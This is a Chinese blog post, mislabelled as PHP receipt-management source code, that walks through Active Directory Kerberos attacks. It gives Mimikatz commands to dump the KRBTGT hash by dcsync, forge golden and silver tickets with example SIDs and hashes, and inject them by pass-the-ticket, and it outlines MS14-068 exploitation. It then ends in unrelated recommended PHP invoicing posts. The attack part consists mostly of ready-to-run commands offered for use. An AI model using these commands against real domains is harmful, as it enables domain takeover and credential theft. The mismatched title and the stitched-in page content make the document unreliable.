php源码 收据管理,黄金票据 白银票据 ms14068(示例代码)

最新推荐文章于 2023-04-07 14:57:26 发布
最新推荐文章于 2023-04-07 14:57:26 发布
阅读量291 收藏
点赞数
文章标签: php源码 收据管理

黄金票据

黄金票据的条件要求:

1.域名称[AD PowerShell模块:(Get-ADDomain).DNSRoot]

2.域的SID 值[AD PowerShell模块:(Get-ADDomain).DomainSID.Value]

3.域的KRBTGT账户NTLM密码哈希

4.伪造用户名

一旦攻击者拥有管理员访问域控制器的权限,就可以使用Mimikatz来提取KRBTGT帐户密码哈希值。

1.导出krbtgt的Hash

在域控上执行通过mimkatz输出:

mimikatz log "lsadump::dcsync /domain:test.local /user:krbtgt"

20200206161721457264.png

生成票据 这里可以用aes256 aes128等等

kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi

20200206161721632075.png

导入票据

kerberos::ptt ppc.kiribi

20200206161721662350.png

klist

klist purge 删除所有票据

20200206161722004160.png

mimikatz # kerberos::purge //清空当前凭证 mimikatz # kerberos::list //查看当前机器凭证 mimikatz # kerberos::ptc 票据文件 //将上一步生成的票据注入到内存中

第二种黄金票据

Hash NTLM: b93dba67240e8236cf1ab028034779e2

aes256_hmac:5c54f6b6d3d4ac4958cf5e04969e60700b69d2285c65ee4e2810e808f4febacckrbtgt

net group "domain admins" /domain

查看域的SID号

whoami /all

kerberos::purge #清空票据 kerberos::golden /admin:administrator /domain:pp.zhong.czf /sid:S-1-5-21-2461438818-3229013638-4126918765 /krbtgt:b93dba67240e8236cf1ab028034779e2 /ticket:ticket.kirbi kerberos::ptt ticket.kirbi kerberos::tgt(此条命令好像并没有用)

白银票据

kerberos::golden /admin:zhangsanfeng /domain:qianxiao996.com /id:1108 /sid:S-1-5-21-2461438818-3229013638-4126918765-1108 /target:QIANXIAO996-DM.school.com /rc4:b1e99870ac1230e33233fb54f240f171 /service:LDAP /ptt

lsadump::dcsync /dc:QIANXIAO996-DM.qianxiao996.com /domain:qianxiao996.com /user:krbtgt

总结

白银票据不与KDC交互,伪造Ticket直接与server进行交互。我们来看一下windows认证的第六步,server接收到客户端的数据包后,使用自己的密码hash解密ticket得出session key,在使用session key解密Authenticator和timestamp即通过验证,所以我们只需要知道server用户的hash就可以伪造出一个ticket,这就是白银票据。

首先,我们访问一个目标机器的C$文件夹

我们来伪造白银票据,获取目标server用户名

获取NTLM Hash

创建票据命令为:

kerberos::golden /domain: /sid: /target: /service: /rc4: /user: /ptt

白银票据根据用户hash生成,而且只能根据某些服务创建,可利用的服务如下

服务注释服务名

WMIHOST、RPCSS

Powershell RemoteingHOST、HTTP

WinRMHOST、HTTP

Scheduled TasksHOST

LDAP 、DCSyncLDAP

Windows File Share (CIFS)CIFS

Windows Remote ServerAdministration ToolsRPCSS、LDAP、CIFS

生成票据

这时候再访问c$,不需要输入密码

0x04 黄金票据分析及利用

第二步中我们收到了AS发送的TGT,由于TGT是使用krbtgt密码hash加密,客户端无法解密,但是如果我们知道了krbtgt的hash,那么就可以直接生成任意用户的TGT,跳过了第一步的认证并可以访问相应的资源,这就是伪造黄金票据。

域控导出krbtgt NTLM Hash

生成黄金票据

kerberos::golden /user:Administrator /domain:domain-name /sid:user-sid/krbtgt:ntlmhash-value /ticket:golden.ti

在目录下生成了golden.ti票据文件,使用票据

kerberos::ptt golden.ti

这时候生成了一个域管理用户票据,尝试访问其他用户资源,成功,无需验证

MS14068

-u 域账号+@+域名称,这里是ts1+@+yunying.lab

-p 为当前用户的密码,即ts1的密码

-s 为ts1的SID值,可以通过whoami /all来获参考户的SID值

-d 为当前域的域控

20200206161722215106.png

清除缓存导入票据

20200206161722284444.png

20200206161722527618.png

最后

20200206161722800089.png

清除票据后

20200206161722897749.png

20200206161723076467.png

https://www.cnblogs.com/backlion/p/8127868.html

https://blog.csdn.net/qq_36374896/article/details/84453994

https://payloads.online/archivers/2018-11-30/1

https://blog.csdn.net/wy_97/article/details/87649262

https://www.varonis.com/blog/kerberos-attack-silver-ticket/

https://adsecurity.org/?p=2011

https://blog.csdn.net/wy_97/article/details/87649262

https://www.varonis.com/blog/kerberos-attack-silver-ticket/

https://adsecurity.org/?p=2011

https://www.dazhuanlan.com/2019/08/26/5d6304010760d/

特别注意的是sid不是本地管理员的sid是域用户的sid 千万别弄错了 先net user查看域用户的sid 或者切到域用户登陆 whoami /all查看 方可 其他没什么

参考文献

https://www.cnblogs.com/backlion/p/8127868.html

https://blog.csdn.net/qq_36374896/article/details/84453994

https://payloads.online/archivers/2018-11-30/1

https://blog.csdn.net/wy_97/article/details/87649262

https://www.varonis.com/blog/kerberos-attack-silver-ticket/

https://adsecurity.org/?p=2011

https://blog.csdn.net/wy_97/article/details/87649262

https://www.varonis.com/blog/kerberos-attack-silver-ticket/

https://adsecurity.org/?p=2011

https://www.dazhuanlan.com/2019/08/26/5d6304010760d/

1.导出krbtgt的Hash

在域控上执行通过mimkatz输出:

mimikatz log "lsadump::dcsync /domain:test.local /user:krbtgt"

Kimgoeunlaogong
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp5.0 根据word内容生成带签章合同的pdf文件
品优源码博客
05-31 997
这里需要用到一个强大的linux工具 libreoffice,因为tcpdf等组件只能生成比较简单的样式。直接执行下面的代码就可以。php执行exec()方法。
php 支付打印发票,支付后开电子发票
weixin_33724264的博客
03-21 1420
1. 场景描述支付后开票通过和微信支付相结合,提供了一种新的发起开票的途径。用户可以在微信支付凭证中看到开具电子发票的入口,这能为某些打印小票存在一定困难的线下场景(如停车场闸机)是一个良好的开票路径,其它需要打印小票的场景,考虑到小票存在丢失的可能,也可以使用支付后开票作为补充。用户使用微信支付完成消费后,付款凭证上会出现开票入口,用户点击开票按钮后提交抬头信息并完成开票授权。发票开好后会同步到...
PHP写的简单纸黄金实时报价抓取爬虫源代码
05-08
PHP写的简单纸黄金实时报价抓取源代码PHP5.4下测试可运行。对时效性要求不高的话,还是可以参考一下的。
PHP通过TCPDF生成PDF,合同实现在线签署
你好,我姓刘
04-07 1421
链接: https://pan.baidu.com/s/1j1XrblQBk6gtmgVmFo1gdw?pwd=899p 提取码: 899p。二、下载字体 放至 tcpdf/fonts/中。(1)、通过composer下载。
php票据打印模板,PHP实现多条采购单据界面
weixin_34154352的博客
03-19 424
前言:写这个博文前几天,还一直在纠结中,但是做完了感觉自信又回来了,作为一名后端程序员,前端的简单的布局是在所难免的,所以有时候也是要折腾一下前端。一 功能简述这个功能主要是用于相关部门打请购申请的,添加多条明细用的二 实现的效果图三 技术难点由于我用的是Eaysui的前端布局,并且封装了一个common.js调用easyui的效果来实现;刚开始是用表格来显示的,但是由于数据比较多,在一行显示显...
J2EE课程设计票据管理系统代码.zip
06-07
J2EE课程设计票据管理系统代码J2EE课程设计票据管理系统代码J2EE课程设计票据管理系统代码J2EE课程设计票据管理系统代码J2EE课程设计票据管理系统代码J2EE课程设计票据管理系统代码。J2EE课程设计票据...
J2EE票据管理系统源码JavaEE课程设计
02-08
J2EE票据管理系统源码JavaEE课程设计
JavaEE课程设计:票据管理系统源码.zip
05-04
JavaEE课程设计:票据管理系统源码 JavaEE课程设计:票据管理系统源码 JavaEE课程设计:票据管理系统源码 JavaEE课程设计:票据管理系统源码 JavaEE课程设计:票据管理系统源码 JavaEE课程设计:票据管理系统...
基于css+java开发的票据管理系统(在线解析银行票据,数据预测,管理)源码(课设).zip
07-01
基于css+java开发的票据管理系统(在线解析银行票据,数据预测,管理)源码(课设).zip基于css+java开发的票据管理系统(在线解析银行票据,数据预测,管理)源码(课设).zip基于css+java开发的票据管理系统(在线解析银行...
票据管理代码
03-23
票据管理代码
票据付费管理系统源码
02-03
票据付费管理系统,实现了简单的票据管理与付费管理功能,以及简单的管理界面
收据模板HTML
10-31
收据模板,电子发票,html。可以用于打印,自己开发,嵌入
php 微信服务号电子发票,微信公布电子发票解决方案,报销更便利
weixin_34921609的博客
03-13 388
4月1日消息,昨日微信官方正式公布了电子发票解决方案。电子发票解决方案调用了微信多个产品能力,通过微信公众号、卡包、扫一扫、企业号、微信支付零钱包等提供的整体连接能力,与众多行业合作伙伴一起,尝试实现电子发票的收纳、归集、流转、报销、入账、再消费的无缝链接。 该解决方案的特色在于,不仅能通过前端的扫一扫、卡包功能实现电子发票的便利收纳、归集,而且通过后端的企业号,用户可以直接勾选卡包中的电子发票,...
php开发电子发票接口,EasyAPI发票管理加油站电子发票解决方案
weixin_30616635的博客
03-18 1375
原标题:EasyAPI发票管理加油站电子发票解决方案时代抛弃你时,连一声再见都不会说。这不,前一秒是还纸质发票,这一秒各行各业就都推行了电子发票。不得不感叹:时代改变真快!当然,电子发票会更方便、更快捷、扫码即得!一劳永逸!我们一定要跟得上时代,不能落伍哟!电子发票接入一点都不难,只需三步,轻松对接。1、 调用 “获取accessToken” API接口 appKey和appSecret登录Eas...
php esc p 打印,ESC/P 打印指令使用,3种票据打印方法(转)
weixin_34651547的博客
03-10 825
具体内容大家自己看!如有好的解决方案大家共同研究!(1)自定义纸张设置控制面板->打印机和传真->右键->服务器属性->创建新的格式(2)自定义纸张使用this.printDocument1.DefaultPageSettings.PaperSize = new System.Drawing.Printing.PaperSize("NewPrint", iWidth, iH...
php源码 收据管理,使用PHP验证Windows 8购买(收据)
weixin_32816613的博客
03-23 127
我设法使用xmlseclibs库验证WP8 IAP收据.此外,您需要启用PHP curl.do {$doc = new DOMDocument();$xml = $_POST['receipt_data']; // your receipt xml here!// strip unwanted chars - IMPORTANT!!!$xml = str_replace(array("\n","\...
springboot+企业财务发票管理系统 毕业设计-附源码231105
yuyuxun的博客
09-02 837
本文正是针对现实中中小型企业财务发票管理的现状,通过对企业财务发票管理系统的功能性需求分析,对系统的安全性和可扩展性进行了非功能性需求分析。在详细的需求分析的基础上,根据系统的功能设计确定了数据库结构,实现完整的代码编写。企业财务发票管理系统完成了主要模块的页面设计和功能实现。本文展示了首页页面的实现效果图,并通过代码和页面介绍了用户注册功能、发票表、项目表管理的实现过程。
php自动生成发票,php – magento中的自动发票
weixin_42531396的博客
03-10 518
我创建了新的自定义产品类型,它扩展了magento中的虚拟产品.现在我想阻止在线支付的自动发票,例如.订单包含至少一种自定义产品类型时,paypal.所有带有此类产品的订单都必须手动开具发票.我该如何解决这个问题?解决方法:最好的方法是在支付捕获过程中向一个事件注册观察者,但不幸的是我没有看到太多相关的事件.您可以尝试使用sales_order_invoice_save_before来拦截save...
医疗电子票据管理平台源码
最新发布
07-28
很抱歉,我无法提供具体的源码。但是,可以为您提供一些关于医疗电子票据管理平台的一般信息。...以上仅为大致的开发内容,具体的医疗电子票据管理平台源码需要根据实际需求进行定制开发。希望这些信息能对您有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值